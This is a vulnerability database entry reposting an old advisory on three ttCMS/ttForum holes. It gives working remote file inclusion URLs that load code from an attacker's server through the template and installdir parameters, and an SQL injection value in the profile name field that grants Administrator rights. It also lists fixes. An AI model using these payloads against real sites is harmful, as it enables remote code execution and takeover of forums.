ttcms and ttforum exploits

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052869 漏洞类型
发布时间 2007-10-23 更新时间 2007-10-23
CVE编号 CVE-2003-1458
CVE-2003-1459
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2007100099
|漏洞详情
漏洞细节尚未披露
|漏洞EXP


hope this is the right place to send this exploit info, I found three

diffrent exploits for a forum software / cms software:

------------------------------------------------------------------------
--

----------------------------------------------------------------------

Affected Product: ttCMS or ttForum

Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:

Open up modules/forum/News.php (ttCMS) or News.php (ttForum).

As you can see, this line:

include($template . '.' . $ext);

Includes a file directly from the user input.

Here's an example exploit URL:

http://www.yourserver.com/ttforum/index.php?

action=news;board=1;template=http://www.yourserver.com/modules/forum/hel
pa

dmin;ext=help

As you can see, it's possible to execute remote code using this hole.

Possible solutions:

Install YaBB SE 1.5.2.  While ttForum is a derivative of YaBB SE, this

hole does not exist there.

Upgrade to a newer version of ttForum/ttCMS that fixes the hole.  (none

is yet available.)

Use a different forum and/or CMS software.

------------------------------------------------------------------------
--

----------------------------------------------------------------------

Affected Product: ttCMS or ttForum

Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:

Open up modules/forum/src/Profile.php (ttCMS) or src/Profile.php

(ttForum).

As you can see, this line:

foreach ($HTTP_POST_VARS as $key => $value) {

$member[$key] = str_replace(array('&', '"', '<', '>'), array

('&', '"', '<', '>'), trim($value));

Parses out ", <, >, and &.  It, however, does not parse out a SINGLE

quote.

Now scroll down.

SET $queryPasswdPart $customTitlePart realName='$member[name]',

As you can see, simply setting your name to "me'

memberGroup='Administrator" would make you an Administrator on any server

that had magic_quotes_gpc off.

As you can see from the php.ini-recommended file:

; - magic_quotes_gpc = Off        [Performance]

They recommend it off, and thus a multitude of servers have it off,

enabling this hole.

Possible solutions:

Install YaBB SE 1.5.2.  While ttForum is a derivative of YaBB SE, this

hole does not exist there.

Upgrade to a newer version of ttForum/ttCMS that fixes the hole.  (none

is yet available.)

Use a different forum and/or CMS software.

------------------------------------------------------------------------
--

----------------------------------------------------------------------

Title:   ttForum / ttCMS, remote command execution.

Application:   ttForum up to 1.1, ttCMS 2.2Platform(s):   Unix

Technical description:

----------------------

Everybody can inject PHP code in ttForum/ttCMS through the

ttForumInstaller. The Installer (which can be found in

the /modules/forumdirectory in ttCMS) includes the Forum-Settings

throughinclude("$installdir/Settings.php") where $installdir istaken from

a Form.In order to exploit this vulnerability, all you have to do is

tocreate a File "Settings.php" on your own webserver which containsthe

code you want to execute on the target-system. If you now callthe

install.php-File with the following parameters:http://target-

system/install.php?step=7&installdir=http://yourserver/the code in

Settings.php will be injected.

Recommendations:

----------------

Delete install.php AS SOON AS POSSIBLE or use YaBB SE 1.5.2 (ttForumis a

derivate of YaBB SE)